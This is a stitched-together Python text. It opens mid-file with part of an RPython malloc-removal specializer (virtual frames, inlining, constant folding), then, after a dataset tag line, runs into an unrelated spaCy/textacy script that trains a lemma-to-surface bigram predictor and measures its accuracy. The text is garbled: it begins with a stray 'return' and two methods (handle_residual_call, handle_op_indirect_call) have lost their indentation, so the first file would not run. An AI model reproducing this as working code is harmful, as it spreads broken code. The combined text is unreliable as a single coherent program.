        return specblock

    def propagate_specializations(self):
        # Drain the worklist until no pending specializer remains.
        while self.pending_specializations:
            spec = self.pending_specializations.pop()
            spec.specialize_operations()
            spec.follow_exits()
class BlockSpecializer(object):
    """Specializes the operations of one block under a given VirtualFrame,
    producing a new Block (self.specblock)."""

    def __init__(self, graphbuilder, v_expand_malloc=None):
        self.graphbuilder = graphbuilder
        # the Variable whose malloc we are currently trying to expand,
        # or None
        self.v_expand_malloc = v_expand_malloc
        self.specblock = Block([])

    def initialize_renamings(self, virtualframe, keep_inputargs=False):
        # we make a copy of the original 'virtualframe' because the
        # specialize_operations() will mutate some of its content.
        virtualframe = virtualframe.copy({})
        self.virtualframe = virtualframe
        self.nodes = virtualframe.get_nodes_in_use()
        self.renamings = {}    # {RuntimeSpecNode(): Variable()}
        if keep_inputargs:
            assert virtualframe.varlist == virtualframe.sourceblock.inputargs
        specinputargs = []
        for i, rtnode in enumerate(virtualframe.find_rt_nodes()):
            if keep_inputargs:
                v = virtualframe.varlist[i]
                assert v.concretetype == rtnode.TYPE
            else:
                v = rtnode.newvar()
            self.renamings[rtnode] = v
            specinputargs.append(v)
        self.specblock.inputargs = specinputargs
    def setnode(self, v, node):
        # Attach `node` to a fresh Variable; double assignment is a bug.
        assert v not in self.nodes
        self.nodes[v] = node

    def getnode(self, v):
        # SpecNode for a Variable, or a constant node for a Constant.
        if isinstance(v, Variable):
            return self.nodes[v]
        else:
            return getconstnode(v, self.renamings)

    def rename_nonvirtual(self, v, where=None):
        # Map `v` to its specialized Variable; fails (CannotVirtualize)
        # if `v` is currently a virtual structure.
        if not isinstance(v, Variable):
            return v
        node = self.nodes[v]
        if not isinstance(node, RuntimeSpecNode):
            raise CannotVirtualize(where)
        return self.renamings[node]

    def expand_nodes(self, nodelist):
        # All runtime Variables reachable from `nodelist`, in order.
        rtnodes, vtnodes = find_all_nodes(nodelist)
        return [self.renamings[rtnode] for rtnode in rtnodes]
    def specialize_operations(self):
        # Run every remaining operation of the source block through its
        # handle_op_* method (default: handle_default), collecting the
        # specialized operations.
        newoperations = []
        self.ops_produced_by_last_op = 0
        # note that 'self.virtualframe' can be changed during the loop!
        while True:
            operations = self.virtualframe.sourceblock.operations
            try:
                op = operations[self.virtualframe.nextopindex]
                self.virtualframe.nextopindex += 1
            except IndexError:
                break
            meth = getattr(self, 'handle_op_' + op.opname,
                           self.handle_default)
            newops_for_this_op = meth(op)
            newoperations += newops_for_this_op
            self.ops_produced_by_last_op = len(newops_for_this_op)
        # residual calls back into a graph on the virtual call stack
        # would loop forever
        for op in newoperations:
            if op.opname == 'direct_call':
                graph = graph_called_by(op)
                if graph in self.virtualframe.calledgraphs:
                    raise CannotVirtualize("recursion in residual call")
        self.specblock.operations = newoperations
    def follow_exits(self):
        # Rebuild the exits of the specialized block: constant-fold a
        # now-constant exitswitch, drop dead exception-catching, and
        # create one outgoing link per surviving exit.
        block = self.virtualframe.sourceblock
        self.specblock.exitswitch = self.rename_nonvirtual(block.exitswitch,
                                                           'exitswitch')
        links = block.exits
        catch_exc = self.specblock.exitswitch == c_last_exception
        if not catch_exc and isinstance(self.specblock.exitswitch, Constant):
            # constant-fold the switch
            for link in links:
                if link.exitcase == 'default':
                    break
                if link.llexitcase == self.specblock.exitswitch.value:
                    break
            else:
                raise Exception("exit case not found?")
            links = (link,)
            self.specblock.exitswitch = None
        if catch_exc and self.ops_produced_by_last_op == 0:
            # the last op of the sourceblock did not produce any
            # operation in specblock, so we need to discard the
            # exception-catching.
            catch_exc = False
            links = links[:1]
            assert links[0].exitcase is None    # the non-exception-catching case
            self.specblock.exitswitch = None
        newlinks = []
        for link in links:
            is_catch_link = catch_exc and link.exitcase is not None
            if is_catch_link:
                # materialize last_exception/last_exc_value as fresh
                # runtime variables on the catching link
                extravars = []
                for attr in ['last_exception', 'last_exc_value']:
                    v = getattr(link, attr)
                    if isinstance(v, Variable):
                        rtnode = RuntimeSpecNode(v, v.concretetype)
                        self.setnode(v, rtnode)
                        self.renamings[rtnode] = v = rtnode.newvar()
                    extravars.append(v)
            linkargsnodes = [self.getnode(v1) for v1 in link.args]
            #
            newlink = self.graphbuilder.create_outgoing_link(
                self.virtualframe, link.target, linkargsnodes,
                self.renamings, self.v_expand_malloc)
            #
            if self.specblock.exitswitch is not None:
                newlink.exitcase = link.exitcase
                if hasattr(link, 'llexitcase'):
                    newlink.llexitcase = link.llexitcase
            if is_catch_link:
                newlink.extravars(*extravars)
            newlinks.append(newlink)
        self.specblock.closeblock(*newlinks)
    def make_rt_result(self, v_result):
        # The operation's result stays a runtime value: attach a fresh
        # RuntimeSpecNode and return the renamed Variable for it.
        newrtnode = RuntimeSpecNode(v_result, v_result.concretetype)
        self.setnode(v_result, newrtnode)
        v_new = newrtnode.newvar()
        self.renamings[newrtnode] = v_new
        return v_new

    def make_const_rt_result(self, v_result, value):
        # Like make_rt_result, but the result is known: rename to a
        # Constant so no residual operation is needed.
        newrtnode = RuntimeSpecNode(v_result, v_result.concretetype)
        self.setnode(v_result, newrtnode)
        if v_result.concretetype is not lltype.Void:
            assert v_result.concretetype == lltype.typeOf(value)
        c_value = Constant(value)
        c_value.concretetype = v_result.concretetype
        self.renamings[newrtnode] = c_value

    def handle_default(self, op):
        # Generic case: keep the operation, renaming its arguments; all
        # arguments must be non-virtual. Constant-fold when possible.
        newargs = [self.rename_nonvirtual(v, op) for v in op.args]
        constresult = try_fold_operation(op.opname, newargs,
                                         op.result.concretetype)
        if constresult:
            self.make_const_rt_result(op.result, constresult[0])
            return []
        else:
            newresult = self.make_rt_result(op.result)
            return [SpaceOperation(op.opname, newargs, newresult)]

    def handle_unreachable(self, op):
        # Replace an operation proven unreachable by a fatal-error stub.
        from rpython.rtyper.lltypesystem.rstr import string_repr
        msg = 'unreachable: %s' % (op,)
        ll_msg = string_repr.convert_const(msg)
        c_msg = Constant(ll_msg, lltype.typeOf(ll_msg))
        newresult = self.make_rt_result(op.result)
        return [SpaceOperation('debug_fatalerror', [c_msg], newresult)]
    def handle_op_getfield(self, op):
        # Reading a field of a virtual struct is just a node lookup.
        node = self.getnode(op.args[0])
        if isinstance(node, VirtualSpecNode):
            fieldname = op.args[1].value
            index = node.typedesc.name2index[fieldname]
            self.setnode(op.result, node.fields[index])
            return []
        else:
            return self.handle_default(op)

    def handle_op_setfield(self, op):
        # Writing a field of a virtual struct mutates the node in place;
        # read-only virtuals force inlining instead.
        node = self.getnode(op.args[0])
        if isinstance(node, VirtualSpecNode):
            if node.readonly:
                raise ForcedInline(op)
            fieldname = op.args[1].value
            index = node.typedesc.name2index[fieldname]
            node.fields[index] = self.getnode(op.args[2])
            return []
        else:
            return self.handle_default(op)

    def handle_op_same_as(self, op):
        # same_as on a virtual: alias the result to the same node.
        node = self.getnode(op.args[0])
        if isinstance(node, VirtualSpecNode):
            node = self.getnode(op.args[0])
            self.setnode(op.result, node)
            return []
        else:
            return self.handle_default(op)

    def handle_op_cast_pointer(self, op):
        # Pointer casts on a virtual disappear; an impossible cast marks
        # the operation as unreachable.
        node = self.getnode(op.args[0])
        if isinstance(node, VirtualSpecNode):
            node = self.getnode(op.args[0])
            SOURCEPTR = lltype.Ptr(node.typedesc.MALLOCTYPE)
            TARGETPTR = op.result.concretetype
            try:
                if lltype.castable(TARGETPTR, SOURCEPTR) < 0:
                    raise lltype.InvalidCast
            except lltype.InvalidCast:
                return self.handle_unreachable(op)
            self.setnode(op.result, node)
            return []
        else:
            return self.handle_default(op)

    def handle_op_ptr_nonzero(self, op):
        # A virtual struct is never a NULL pointer.
        node = self.getnode(op.args[0])
        if isinstance(node, VirtualSpecNode):
            self.make_const_rt_result(op.result, True)
            return []
        else:
            return self.handle_default(op)

    def handle_op_ptr_iszero(self, op):
        node = self.getnode(op.args[0])
        if isinstance(node, VirtualSpecNode):
            self.make_const_rt_result(op.result, False)
            return []
        else:
            return self.handle_default(op)

    def handle_op_ptr_eq(self, op):
        # Pointer identity of virtuals is node identity.
        node0 = self.getnode(op.args[0])
        node1 = self.getnode(op.args[1])
        if (isinstance(node0, VirtualSpecNode) or
                isinstance(node1, VirtualSpecNode)):
            self.make_const_rt_result(op.result, node0 is node1)
            return []
        else:
            return self.handle_default(op)

    def handle_op_ptr_ne(self, op):
        node0 = self.getnode(op.args[0])
        node1 = self.getnode(op.args[1])
        if (isinstance(node0, VirtualSpecNode) or
                isinstance(node1, VirtualSpecNode)):
            self.make_const_rt_result(op.result, node0 is not node1)
            return []
        else:
            return self.handle_default(op)
    def handle_op_malloc(self, op):
        # Expand the malloc we are specializing on: replace the allocation
        # with a VirtualSpecNode whose fields start out as runtime nodes
        # renamed to the field types' default values.
        if op.result is self.v_expand_malloc:
            MALLOCTYPE = op.result.concretetype.TO
            typedesc = self.graphbuilder.mallocv.getmalloctypedesc(MALLOCTYPE)
            virtualnode = VirtualSpecNode(typedesc, [])
            self.setnode(op.result, virtualnode)
            for name, FIELDTYPE in typedesc.names_and_types:
                fieldnode = RuntimeSpecNode(name, FIELDTYPE)
                virtualnode.fields.append(fieldnode)
                # each fresh field initially maps to its type's default value
                c = Constant(FIELDTYPE._defl())
                c.concretetype = FIELDTYPE
                self.renamings[fieldnode] = c
            self.v_expand_malloc = None # done
            return []
        else:
            return self.handle_default(op)
    def handle_op_direct_call(self, op):
        # Specialize a direct call. Depending on the malloc-removal analysis
        # the call is kept as-is ('trivial'), inlined into the current graph
        # ('inline'), redirected to a specialized copy of the callee
        # ('call'), or it blocks virtualization entirely ('fail').
        graph = graph_called_by(op)
        if graph is None:
            return self.handle_default(op)
        nb_args = len(op.args) - 1
        assert nb_args == len(graph.getargs())
        newnodes = [self.getnode(v) for v in op.args[1:]]
        myframe = self.get_updated_frame(op)
        mallocv = self.graphbuilder.mallocv
        if op.result is self.v_expand_malloc:
            # move to inlining the callee, and continue looking for the
            # malloc to expand in the callee's graph
            op_to_remove = mallocv.inline_and_remove[graph]
            self.v_expand_malloc = op_to_remove.result
            return self.handle_inlined_call(myframe, graph, newnodes)
        # nodes passed to the callee are flagged read-only when they are
        # reachable from the caller's virtual nodes
        argnodes = copynodes(newnodes, flagreadonly=myframe.find_vt_nodes())
        kind, newgraph = mallocv.get_specialized_graph(graph, argnodes)
        if kind == 'trivial':
            return self.handle_default(op)
        elif kind == 'inline':
            return self.handle_inlined_call(myframe, graph, newnodes)
        elif kind == 'call':
            return self.handle_residual_call(op, newgraph, newnodes)
        elif kind == 'fail':
            raise CannotVirtualize(op)
        else:
            raise ValueError(kind)
    def get_updated_frame(self, op):
        # Snapshot the current frame as an inlined callee should see it:
        # op.result is temporarily mapped to a FutureReturnValue placeholder
        # so the snapshot records where the return value must go, then the
        # temporary entry is removed again from the live node map.
        sourceblock = self.virtualframe.sourceblock
        nextopindex = self.virtualframe.nextopindex
        self.nodes[op.result] = FutureReturnValue(op)
        myframe = VirtualFrame(sourceblock, nextopindex, self.nodes,
                               self.virtualframe.callerframe,
                               self.virtualframe.calledgraphs)
        del self.nodes[op.result]
        return myframe
def handle_residual_call(self, op, newgraph, newnodes):
fspecptr = getfunctionptr(newgraph)
newargs = [Constant(fspecptr,
concretetype=lltype.typeOf(fspecptr))]
newargs += self.expand_nodes(newnodes)
newresult = self.make_rt_result(op.result)
newop = SpaceOperation('direct_call', newargs, newresult)
return [newop]
    def handle_inlined_call(self, myframe, graph, newnodes):
        # Switch the builder to executing the callee's start block in a new
        # frame; recursion is detected via the set of graphs already being
        # inlined along this call chain.
        assert len(graph.getargs()) == len(newnodes)
        targetnodes = dict(zip(graph.getargs(), newnodes))
        calledgraphs = myframe.calledgraphs.copy()
        if graph in calledgraphs:
            raise CannotVirtualize("recursion during inlining")
        calledgraphs[graph] = True
        calleeframe = VirtualFrame(graph.startblock, 0,
                                   targetnodes, myframe, calledgraphs)
        self.virtualframe = calleeframe
        self.nodes = calleeframe.get_nodes_in_use()
        return []
def handle_op_indirect_call(self, op):
v_func = self.rename_nonvirtual(op.args[0], op)
if isinstance(v_func, Constant):
op = SpaceOperation('direct_call', [v_func] + op.args[1:-1],
op.result)
return self.handle_op_direct_call(op)
else:
return self.handle_default(op)
class FutureReturnValue(object):
    """Placeholder node for the not-yet-computed return value of a call
    being inlined. It is never virtual and never contributes nodes."""

    def __init__(self, op):
        # kept only to make debugging dumps readable
        self.op = op

    def getfrozenkey(self, memo):
        return None

    def accumulate_nodes(self, rtnodes, vtnodes):
        pass

    def copy(self, memo, flagreadonly):
        return self
# ____________________________________________________________
# helpers
def vars_alive_through_op(block, index):
    """Return the Variables live across block.operations[index]: values
    needed by that operation or anything after it (including the exit
    switch and outgoing link arguments), excluding values only produced
    at or after that point."""
    # NB. make sure this always returns the variables in the same order
    if len(block.exits) == 0:
        return block.inputargs # return or except block
    result = []
    seen = {}
    def see(v):
        if isinstance(v, Variable) and v not in seen:
            result.append(v)
            seen[v] = True
    # don't include the variables produced by the current or future operations
    for op in block.operations[index:]:
        seen[op.result] = True
    # don't include the extra vars produced by exception-catching links
    for link in block.exits:
        for v in link.getextravars():
            seen[v] = True
    # but include the variables consumed by the current or any future operation
    for op in block.operations[index:]:
        for v in op.args:
            see(v)
    see(block.exitswitch)
    for link in block.exits:
        for v in link.args:
            see(v)
    return result
def is_return(block):
    """True for a graph's return block: no exits and exactly one input."""
    return not block.exits and len(block.inputargs) == 1
def is_except(block):
    """True for a graph's exception block: no exits and two inputs
    (exception type and exception value)."""
    return not block.exits and len(block.inputargs) == 2
class CannotConstFold(Exception):
    """Raised when an operation cannot be constant-folded."""
    pass
def try_fold_operation(opname, args_v, RESTYPE):
    """Try to constant-fold the low-level operation *opname* on *args_v*.

    Returns a 1-tuple ``(result,)`` on success, or None when folding is
    not possible: a non-constant argument, an unknown operation, an
    impure operation, or the folding itself raising.
    """
    args = []
    for c in args_v:
        if not isinstance(c, Constant):
            return            # non-constant argument: cannot fold
        args.append(c.value)
    try:
        op = getattr(llop, opname)
    except AttributeError:
        return                # unknown low-level operation
    if not op.is_pure(args_v):
        return                # impure operations must not be folded away
    try:
        result = op(RESTYPE, *args)
    except TypeError:
        pass
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception:
        # fixed: was `except Exception, e:` which is Python-2-only syntax;
        # `e` was only used by the commented-out log lines below.
        pass
        #log.WARNING('constant-folding %s%r:' % (opname, args_v))
        #log.WARNING('  %s: %s' % (e.__class__.__name__, e))
    else:
        return (result,)
def getconstnode(v, renamings):
    """Wrap the constant *v* in a fresh RuntimeSpecNode and record the
    renaming back to *v*."""
    node = RuntimeSpecNode(None, v.concretetype)
    renamings[node] = v
    return node
def graph_called_by(op):
    """Return the flow graph targeted by a direct_call, or None when the
    called function object carries no graph."""
    assert op.opname == 'direct_call'
    funcobj = op.args[0].value._obj
    return getattr(funcobj, 'graph', None)
| nilq/baby-python | python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# # # #
# model-bi-gramms.py
# @author Zhibin.LU
# @created Fri Feb 23 2018 17:14:32 GMT-0500 (EST)
# @last-modified Wed Mar 14 2018 19:11:45 GMT-0400 (EDT)
# @website: https://louis-udm.github.io
# # # #
import gzip
import time
from collections import Counter
import regex as re
import spacy
import textacy
import loader
def load_data(folder):
    """
    Load text in a string.

    Reads every gzipped file in *folder*; each non-comment line is a
    tab-separated "surface<TAB>lemma" pair. Both words are lower-cased,
    stripped of apostrophes, and punctuation/digits are padded with
    spaces. Returns (lemma_corpus, surface_corpus) as two space-joined
    strings of equal token alignment.
    """
    file_paths = loader.list_files(folder)
    input_words = []
    target_words = []
    # Compile the patterns once instead of on every line (the original
    # recompiled them inside the inner loop).
    apostrophe_re = re.compile(r'\'')
    punct_re = re.compile("([\?\!\~\&\=\[\]\{\}\<\>\(\)\_\-\+\/\.])")
    plural_digits_re = re.compile(r'\d+s')
    digits_re = re.compile(r'(\d+)')
    spaces_re = re.compile(' +')
    for file_path in file_paths:
        with gzip.open(file_path, 'rt', encoding='ISO-8859-1') as f:
            for line in f.read().split('\n'):
                if line.startswith('#begin') or line.startswith('#end'):
                    continue
                line = line.encode("ascii", errors="ignore").decode()
                split_result = line.split('\t')
                if len(split_result) != 2:
                    continue
                target_word, input_word = split_result
                input_word = input_word.lower().strip()
                target_word = target_word.lower().strip()
                input_word = apostrophe_re.sub('', input_word)
                target_word = apostrophe_re.sub('', target_word)
                input_word = punct_re.sub(r" \1 ", input_word)
                target_word = punct_re.sub(r" \1 ", target_word)
                # If the surface form has a plural number ("1990s") but the
                # lemma does not, pluralize the lemma's digits to match.
                if plural_digits_re.search(target_word) is not None and \
                        plural_digits_re.search(input_word) is None:
                    input_word = digits_re.sub(r"\1s", input_word)
                input_word = digits_re.sub(r" \1 ", input_word)
                target_word = digits_re.sub(r" \1 ", target_word)
                input_word = spaces_re.sub(' ', input_word)
                target_word = spaces_re.sub(' ', target_word)
                if input_word == '':
                    continue
                input_words.append(input_word)
                target_words.append(target_word)
    return ' '.join(input_words), ' '.join(target_words)
# Load the lemma/surface corpora and collapse any leftover runs of spaces
# produced by the padding done in load_data().
print("{} Loading data...".format(time.strftime("%d-%m-%Y %H:%M:%S")))
train_lemm_corpus, train_surf_corpus = load_data('data/train')
test_lemm_corpus, test_surf_corpus = load_data('data/test')
train_lemm_corpus = re.sub(' +', ' ', train_lemm_corpus)
train_surf_corpus = re.sub(' +', ' ', train_surf_corpus)
test_lemm_corpus = re.sub(' +', ' ', test_lemm_corpus)
test_surf_corpus = re.sub(' +', ' ', test_surf_corpus)
# %%
'''
Get 2-gramms model, all types, all sentences of train_lemme set.
Get 2-gramms model, all types, all sentences of train_surface set.
Get all types, all sentences of test_lemme set.
Get all types, all sentences of test_surface set.
'''
print("{} Training model...".format(time.strftime("%d-%m-%Y %H:%M:%S")))
start_time = time.time()
# parser and tagger are disabled: only tokenization is needed here
nlp = spacy.load('en', disable=['parser', 'tagger'])
train_lemm_tacy_doc = nlp(train_lemm_corpus)
train_surf_tacy_doc = nlp(train_surf_corpus)
test_lemm_tacy_doc = nlp(test_lemm_corpus)
test_surf_tacy_doc = nlp(test_surf_corpus)
# The lemma and surface docs must stay token-aligned for the pairwise
# training below; a mismatch here only warns, it does not abort.
print('Tokens of train_lemm_tacy_doc: ', len(train_lemm_tacy_doc))
print('Tokens of train_surf_tacy_doc: ', len(train_surf_tacy_doc))
if len(train_lemm_tacy_doc) != len(train_surf_tacy_doc):
    print('Warning: the numbre of tokens of lemme and surfaceis in train not equal !!!!!!')
print('Tokens of test_lemm_tacy_doc: ', len(test_lemm_tacy_doc))
print('Tokens of test_surf_tacy_doc: ', len(test_surf_tacy_doc))
if len(test_lemm_tacy_doc) != len(test_surf_tacy_doc):
    print('Warning: the numbre of tokens of lemme and surfaceis on test not equal !!!!!!')
# %%
def _split_sentences(doc):
    """Split a spaCy doc into sentence spans ending at '.', '?' or '!'.

    Trailing tokens after the last sentence terminator are dropped,
    matching the original inline loops this helper replaces (the same
    loop used to be copy-pasted four times below).
    """
    sents = []
    start_ind = 0
    for token in doc:
        if token.text in ['.', '?', '!']:
            sents.append(doc[start_ind:token.i + 1])
            start_ind = token.i + 1
    return sents

train_surf_tacy_sents = _split_sentences(train_surf_tacy_doc)
print('total sentence of train surf:', len(train_surf_tacy_sents))
train_lemm_tacy_sents = _split_sentences(train_lemm_tacy_doc)
print('total sentence of train lemm:', len(train_lemm_tacy_sents))
if len(train_surf_tacy_sents) != len(train_lemm_tacy_sents):
    print('Warning: the numbre of sentances of lemme and surface is not equal !!!!!!')
test_surf_tacy_sents = _split_sentences(test_surf_tacy_doc)
print('total sentence of test surf:', len(test_surf_tacy_sents))
test_lemm_tacy_sents = _split_sentences(test_lemm_tacy_doc)
print('total sentence of test lemm:', len(test_lemm_tacy_sents))
if len(test_surf_tacy_sents) != len(test_lemm_tacy_sents):
    print('Warning: the numbre of sentances of lemme and surface on test is not equal !!!!!!')
# %%
def _term_bag(doc, n):
    """Bag of n-gram counts (lower-cased strings) for *doc*, keeping
    stopwords, punctuation, numbers and determiners.

    Factors out the to_bag_of_terms() call that was duplicated six
    times below with identical keyword arguments.
    """
    return doc.to_bag_of_terms(ngrams=n, normalize='lower', named_entities=False,
                               weighting='count', as_strings=True, filter_stops=False,
                               filter_punct=False, filter_nums=False,
                               drop_determiners=False)

train_lemm_tacy_doc = textacy.Doc(train_lemm_tacy_doc)
train_surf_tacy_doc = textacy.Doc(train_surf_tacy_doc)
train_lemm_2grams_bag = _term_bag(train_lemm_tacy_doc, 2)
print('size of train lemm 2grams bag:', len(train_lemm_2grams_bag))
train_lemm_1grams_bag = _term_bag(train_lemm_tacy_doc, 1)
print('size of train lemm 1grams bag:', len(train_lemm_1grams_bag))
train_surf_2grams_bag = _term_bag(train_surf_tacy_doc, 2)
print('size of train surf 2grams bag:', len(train_surf_2grams_bag))
train_surf_1grams_bag = _term_bag(train_surf_tacy_doc, 1)
print('size of train surf 1grams bag:', len(train_surf_1grams_bag))
test_lemm_tacy_doc = textacy.Doc(test_lemm_tacy_doc)
test_surf_tacy_doc = textacy.Doc(test_surf_tacy_doc)
test_lemm_1grams_bag = _term_bag(test_lemm_tacy_doc, 1)
print('size of test lemm 1grams bag:', len(test_lemm_1grams_bag))
test_surf_1grams_bag = _term_bag(test_surf_tacy_doc, 1)
print('size of test surf 1grams bag:', len(test_surf_1grams_bag))
# %%
# test code
print(type(train_lemm_2grams_bag), len(train_lemm_2grams_bag))
# NOTE(review): the next line prints len(train_lemm_2grams_bag) again;
# it probably meant len(train_lemm_1grams_bag).
print(type(train_lemm_1grams_bag), len(train_lemm_2grams_bag))
print('him . ', train_lemm_2grams_bag['him .'])
print('. the', train_lemm_2grams_bag['. the'])
# print the first 11 sentences as a sanity check
i = 0
for sent in train_lemm_tacy_sents:
    print(sent.text)
    i += 1
    if i > 10: break
# test code
# for i,chs in enumerate(zip(train_lemm_tacy_doc.tokens,train_surf_tacy_doc.tokens)):
# # if chs[0].text=='have' and chs[1].text=="'":
# # print(i,chs[0],chs[1])
# # break
# if chs[0].text not in ['be','find','get','have','a','he','lie','use','leave','go','see','she','we','i','would'] and chs[0].text[0]!=chs[1].text[0]:
# print(i,chs[0],chs[1])
# break
# # if i>=740 and i<=750:
# # print(i,chs[0],chs[1])
#
# # print(train_lemm_corpus[0:200])
# for i,chs in enumerate(zip(train_lemm_tacy_doc.tokens,train_lemm_corpus.split(' '))):
# if chs[0].text!=chs[1]:
# print(i,'|'+chs[0].text+'|','|'+chs[1]+'|')
# # break
# if i>345:
# break
# %%
'''
Get all pair of surf-lemma and their count on train data set.
'''
# Count how often each "surface lemma" token pair occurs in training.
pairs_list = []
for lemma, surf in zip(train_lemm_tacy_doc, train_surf_tacy_doc):
    pairs_list.append(surf.text.strip() + ' ' + lemma.text.strip())
# Counter counts all pairs in one O(n) pass; the original called
# pairs_list.count(pair) inside a loop, which is O(n^2) over the corpus.
train_surf_lemm_map = dict(Counter(pairs_list))
# test code
print('are be ', train_surf_lemm_map['are be'])
# print('( ( ',train_surf_lemm_map['( ('])
# print('. . ',train_surf_lemm_map['. .'])
# %%
# test code
# print('(rimatara reed) ',train_lemm_2grams_bag['rimatara reed'])
print('(you be) ', train_lemm_2grams_bag['you be'])
print('(he go) ', train_lemm_2grams_bag['he go'])
# Conditional probabilities p(w2|w1) = count(w1 w2) / count(w1):
print('p(be|you)=', train_lemm_2grams_bag['you be'] / train_lemm_1grams_bag['you'])
print('p(cat|a)=', train_lemm_2grams_bag['a cat'] / train_lemm_1grams_bag['a'])
print('p(am|i)=', train_surf_2grams_bag['i am'] / train_surf_1grams_bag['i'])
print('p(be-o|are-s)=', train_surf_lemm_map['are be'] / train_surf_1grams_bag['are'])
print('p(.-o|.-s)=', train_surf_lemm_map['. .'] / train_surf_1grams_bag['.'])
# print('p(the|bos)=',train_surf_2grams_bag['. the'])
# %%
'''
Functions of Evalutate the prediction
'''
def count_accuracy_raw(pred_corpus, target_corpus):
    """
    Token-level accuracy between two raw corpora.

    Both corpora are split into sentences on '.' and each sentence into
    tokens on ' '; aligned tokens are compared pairwise. Returns
    (matching_tokens, compared_tokens).
    """
    matches = 0
    compared = 0
    sentence_pairs = zip(pred_corpus.split('.'), target_corpus.split('.'))
    for pred_sent, target_sent in sentence_pairs:
        token_pairs = zip(pred_sent.split(' '), target_sent.split(' '))
        for pred_tok, target_tok in token_pairs:
            compared += 1
            matches += (pred_tok == target_tok)
    return matches, compared
# Baseline: how often the raw lemma token already equals the surface form.
raw_acc_count, raw_count_total = count_accuracy_raw(train_lemm_corpus, train_surf_corpus)
print('test of Accuracy raw:', raw_acc_count, '/', raw_count_total, '=', raw_acc_count / raw_count_total)
def count_accuracy_spacy_raw(pred_sents, target_sents):
    """
    Test accuracy, accuracy of spacy's token

    Compares aligned sentences token by token (via token.text) and
    returns (matching_tokens, compared_tokens).
    """
    count_accu = 0
    total = 0
    for pred_sent, target_sent in zip(pred_sents, target_sents):
        # bugfix: the original also incremented `total` once per sentence
        # here, inflating the denominator by the number of sentences.
        for pred_token, target_token in zip(pred_sent, target_sent):
            total += 1
            if pred_token.text == target_token.text:
                count_accu += 1
    return count_accu, total
# Same baseline, computed on the spaCy-tokenized sentence lists.
spacy_acc_count, spacy_count_total = count_accuracy_spacy_raw(train_lemm_tacy_sents, train_surf_tacy_sents)
print('test of Accuracy spacy:', spacy_acc_count, '/', spacy_count_total, '=', spacy_acc_count / spacy_count_total)
# this function is for when we want stop it before all sentences.
# if not, utilse metric.accuracy instead
def count_accuracy(pred_sents, target_sents):
    """Accuracy between predicted sentence strings and spaCy sentences.

    Each predicted sentence is split on '-', ' ' or '?', and the pieces
    are compared with the target tokens' .text pairwise. Meant for
    stopping early before all sentences are predicted; otherwise use
    metric.accuracy. Returns (matching_tokens, compared_tokens).
    """
    matches, compared = 0, 0
    for pred_sent, target_sent in zip(pred_sents, target_sents):
        pred_tokens = re.split(r"-| |\?", pred_sent)
        for pred_tok, target_tok in zip(pred_tokens, target_sent):
            compared += 1
            if pred_tok == target_tok.text:
                matches += 1
    return matches, compared
def decode_sents(vectors, type_list):
    """Map each vector of type indices back to a space-joined sentence."""
    return [' '.join(type_list[idx] for idx in vec) for vec in vectors]
def decode_sent(vector, type_list):
    """Map one vector of type indices back to a space-joined sentence."""
    return ' '.join(type_list[idx] for idx in vector)
# %%
'''
**** Model Bi-gramms predicteur ****
'''
'''
Get all [lemm(t-1),lemm(t)] -> surf(t)
and get map of bi-gramms [lemm(t-1),lemm(t)] -> surf word ,
in which the surface word is max count of the same pair of [lemm(t-1),lemm(t)].
for example: if there have {[you be]->are} 3 times, and {[you be]->is} 1 times,
then map([you be])=are.
'''
# Collect, for every context key (the bare lemma at sentence start, or
# "previous-lemma current-lemma" elsewhere), the list of surface forms
# observed in training, then keep the most frequent one per key.
bigramms_lemm_surf_map = {}
bigramms_lemm_surf_count_map = {}
for lemm_sent, surf_sent in zip(train_lemm_tacy_sents, train_surf_tacy_sents):
    lemm_pre = None
    for i, (lemm_tok, surf_tok) in enumerate(zip(lemm_sent, surf_sent)):
        key = lemm_tok.text if i == 0 else lemm_pre + ' ' + lemm_tok.text
        bigramms_lemm_surf_count_map.setdefault(key, []).append(surf_tok.text)
        lemm_pre = lemm_tok.text
for key, surfs in bigramms_lemm_surf_count_map.items():
    bigramms_lemm_surf_map[key] = Counter(surfs).most_common(1)[0][0]
print('size of bi-grammes: ', len(bigramms_lemm_surf_map))
# test code
print('you be -> ', bigramms_lemm_surf_map['you be'])
# %%
'''
Model Bi-gramms predicteur predict on test data
'''
# For each test sentence, predict each surface token from the bi-gram
# (previous lemma, current lemma) -> surface map built above, falling
# back to the lemma itself when the context was never seen in training.
# count_accu tallies correct predictions on the fly.
print('--Model Bi-gramms predicteur predict on test data:---')
bigramms_pred_sents = []
count_accu = 0
for k, sent in enumerate(zip(test_lemm_tacy_sents, test_surf_tacy_sents)):
    pred_sent = []
    for i, token in enumerate(zip(sent[0], sent[1])):
        if i == 0:
            # sentence start: the key is the bare first lemma
            if token[0].text in bigramms_lemm_surf_map:
                pred_token = bigramms_lemm_surf_map[token[0].text]
                if pred_token == token[1].text:
                    count_accu += 1
                pred_sent.append(pred_token)
            else:
                # if can't find the pair of this lemm word,use directly this lemm word
                pred_sent.append(token[0].text)
                # if this not paired lemm word ==the surface word correspondant.
                if token[0].text == token[1].text:
                    count_accu += 1
            lemm_pre = token[0].text
        else:
            # mid-sentence: the key is "previous-lemma current-lemma"
            if lemm_pre + ' ' + token[0].text in bigramms_lemm_surf_map:
                pred_token = bigramms_lemm_surf_map[lemm_pre + ' ' + token[0].text]
                if pred_token == token[1].text:
                    count_accu += 1
                pred_sent.append(pred_token)
            else:
                # if can't find the pair of this lemm word,use directly this lemm word
                pred_sent.append(token[0].text)
                # if this not paired lemm word ==the surface word correspondant.
                if token[0].text == token[1].text:
                    count_accu += 1
            lemm_pre = token[0].text
    pred_sent_text = ' '.join(pred_sent)
    # pred_sent_text=pred_sent_text.rstrip()
    bigramms_pred_sents.append(pred_sent_text)
    # echo the first 31 sentences for manual inspection
    if k <= 30:
        print('-- NO.', k)
        print(test_lemm_tacy_sents[k].text)
        print(test_surf_tacy_sents[k].text)
        print(pred_sent_text)
# %%
'''
Calcule accuracy of Bi-gramme model:
'''
raw_acc_count, raw_count_total = count_accuracy_raw(test_lemm_corpus, test_surf_corpus)
print('Accuracy raw on test data:', raw_acc_count, '/', raw_count_total, '=', raw_acc_count / raw_count_total)
test_surf_tacy_sents_raw = [sent.text for sent in test_surf_tacy_sents]
from metric import *
taux_accu = accuracy(test_surf_tacy_sents_raw, bigramms_pred_sents)
print('Accuracy of bi-gramms predicteur on test data:', count_accu, '/', len(test_surf_tacy_doc), '=', taux_accu)
end_time = time.time()
